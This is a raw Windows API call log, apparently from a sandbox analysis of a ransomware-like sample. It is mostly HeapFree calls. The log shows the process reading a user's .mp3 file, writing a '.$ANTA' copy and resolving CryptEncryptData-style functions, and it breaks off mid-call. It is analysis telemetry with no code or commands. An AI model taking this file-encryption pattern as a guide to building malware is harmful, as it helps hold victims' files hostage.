PeekMessageW (in: lpMsg=0x144e6a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e6a4) returned 0 [0117.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0117.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0117.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0117.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf70 | out: hHeap=0x1780000) returned 1 [0117.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caef8 | out: hHeap=0x1780000) returned 1 [0117.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb060 | out: hHeap=0x1780000) returned 1 [0117.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0300 | out: hHeap=0x1780000) returned 1 [0117.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0117.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8d08 | out: hHeap=0x1780000) returned 1 [0117.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafa0 | out: hHeap=0x1780000) returned 1 [0117.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafb8 | out: hHeap=0x1780000) returned 1 [0117.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadd8 | out: hHeap=0x1780000) returned 1 [0117.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafd0 | out: hHeap=0x1780000) returned 1 [0117.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb180 | out: hHeap=0x1780000) returned 1 [0117.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb168 | out: hHeap=0x1780000) returned 1 [0117.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0117.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e99c8 | out: hHeap=0x1780000) returned 1 [0117.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0117.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0117.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0117.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0117.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff90 | out: hHeap=0x1780000) returned 1 [0117.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0117.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0117.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0117.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0198 | out: hHeap=0x1780000) returned 1 [0117.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0117.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0148 | out: hHeap=0x1780000) returned 1 [0117.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0117.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdb0 | out: hHeap=0x1780000) returned 1 [0117.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0117.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0117.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0117.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01c0 | out: hHeap=0x1780000) returned 1 [0117.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0117.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0350 | out: hHeap=0x1780000) returned 1 [0117.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0117.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd88 | out: hHeap=0x1780000) returned 1 [0117.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae98 | out: hHeap=0x1780000) returned 1 [0117.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0117.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e28a8 | out: hHeap=0x1780000) returned 1 [0117.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0117.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2848 | out: hHeap=0x1780000) returned 1 [0117.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797008 | out: hHeap=0x1780000) returned 1 [0117.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0117.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0117.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0117.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0120 | out: hHeap=0x1780000) returned 1 [0117.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0117.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0117.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff40 | out: hHeap=0x1780000) returned 1 [0117.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0117.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00f8 | out: hHeap=0x1780000) returned 1 [0117.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0117.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfec8 | out: hHeap=0x1780000) returned 1 [0117.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0117.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd60 | out: hHeap=0x1780000) returned 1 [0117.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0117.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0117.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0117.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0260 | out: hHeap=0x1780000) returned 1 [0117.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0117.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0117.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0117.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdd8 | out: hHeap=0x1780000) returned 1 [0117.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0117.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0117.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0117.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00d0 | out: hHeap=0x1780000) returned 1 [0117.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0117.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0117.108] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0117.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea040 | out: hHeap=0x1780000) returned 1 [0117.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0117.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0117.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac700 | out: hHeap=0x1780000) returned 1 [0117.108] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0117.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac640 | out: hHeap=0x1780000) returned 1 [0117.108] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0117.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0117.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0117.108] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\RjvHKIDt9\\evi6Nl1 g1KyY\\-a1fx91SeT 48T\\ssO YlBHXom4.mp3" (normalized: "c:\\users\\fd1hvy\\music\\rjvhkidt9\\evi6nl1 g1kyy\\-a1fx91set 48t\\sso ylbhxom4.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0117.109] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0117.109] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144e7a8 | out: lpNewFilePointer=0x0) returned 1 [0117.109] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0117.109] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0117.109] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0117.109] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00f8 | out: hHeap=0x1780000) returned 1 [0117.109] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0117.109] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0117.109] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0117.109] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0117.109] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0117.109] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0117.109] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac640 | out: hHeap=0x1780000) returned 1 [0117.109] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0117.109] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0117.109] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ec8 | out: hHeap=0x1780000) returned 1 [0117.109] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0117.109] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0117.109] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0117.109] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0117.110] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0117.110] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x42d9718 | out: hHeap=0x1780000) returned 1 [0117.110] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0117.110] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0117.110] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0117.110] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391dc8 | out: hHeap=0x1780000) returned 1 [0117.110] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0117.110] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a40c8 | out: hHeap=0x1780000) returned 1 [0117.110] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0117.110] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0117.110] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0117.110] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\RjvHKIDt9\\evi6Nl1 g1KyY\\-a1fx91SeT 48T\\" (normalized: "c:\\users\\fd1hvy\\music\\rjvhkidt9\\evi6nl1 g1kyy\\-a1fx91set 48t")) returned 0x10 [0117.110] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a49d0 | out: hHeap=0x1780000) returned 1 [0117.110] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0117.110] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a46a0 | out: hHeap=0x1780000) returned 1 [0117.110] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0117.110] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0117.110] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0117.110] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\RjvHKIDt9\\evi6Nl1 g1KyY\\-a1fx91SeT 48T\\ssO YlBHXom4.mp3.$ANTA" (normalized: "c:\\users\\fd1hvy\\music\\rjvhkidt9\\evi6nl1 g1kyy\\-a1fx91set 48t\\sso ylbhxom4.mp3.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0117.110] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0117.111] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0117.111] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0117.111] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0148 | out: hHeap=0x1780000) returned 1 [0117.111] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0117.111] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0117.111] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0117.111] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e28 | out: hHeap=0x1780000) returned 1 [0117.111] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0117.111] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0117.111] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac780 | out: hHeap=0x1780000) returned 1 [0117.111] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0117.111] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0117.111] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797048 | out: hHeap=0x1780000) returned 1 [0117.111] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0117.111] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0117.161] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144e7f8 | out: lpNewFilePointer=0x0) returned 1 [0117.161] ReadFile (in: hFile=0x258, lpBuffer=0x43eaa90, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144e820, lpOverlapped=0x0 | out: lpBuffer=0x43eaa90*, lpNumberOfBytesRead=0x144e820*=0x10000, lpOverlapped=0x0) returned 1 [0117.164] ReadFile (in: hFile=0x258, lpBuffer=0x43eaa90, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144e820, lpOverlapped=0x0 | out: lpBuffer=0x43eaa90*, lpNumberOfBytesRead=0x144e820*=0x2108, lpOverlapped=0x0) returned 1 [0117.164] ReadFile (in: hFile=0x258, lpBuffer=0x43eaa90, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144e820, lpOverlapped=0x0 | out: lpBuffer=0x43eaa90*, lpNumberOfBytesRead=0x144e820*=0x0, lpOverlapped=0x0) returned 1 [0117.164] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0117.164] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0117.164] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0117.165] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e03020 | out: hHeap=0x1780000) returned 1 [0117.167] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0117.167] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0117.167] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff90 | out: hHeap=0x1780000) returned 1 [0117.167] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0117.167] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0117.167] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0117.167] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0117.167] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0117.167] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0117.167] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0117.168] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0117.168] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfec8 | out: hHeap=0x1780000) returned 1 [0117.168] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0117.168] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0117.168] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797008 | out: hHeap=0x1780000) returned 1 [0117.168] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0117.168] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0117.168] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0117.168] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391dc8 | out: hHeap=0x1780000) returned 1 [0117.168] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0117.168] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0117.168] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0117.168] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0117.168] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0117.168] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0117.168] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0117.168] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0117.168] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0117.168] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0117.168] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0117.168] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0117.168] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0117.168] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0117.168] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0117.168] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0117.168] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0117.169] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0117.169] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0117.169] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2930 | out: hHeap=0x1780000) returned 1 [0117.169] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0117.169] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0117.169] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0117.169] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0117.169] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0117.169] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0117.169] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0117.169] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0117.169] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0418 | out: hHeap=0x1780000) returned 1 [0117.169] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0117.169] PeekMessageW (in: lpMsg=0x144e18c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e18c) returned 0 [0117.169] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0117.169] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0117.169] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a80 | out: hHeap=0x1780000) returned 1 [0117.169] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0117.169] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0117.169] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0117.169] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8de0 | out: hHeap=0x1780000) returned 1 [0117.169] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0117.169] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2930 | out: hHeap=0x1780000) returned 1 [0117.169] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0117.169] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0117.169] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, 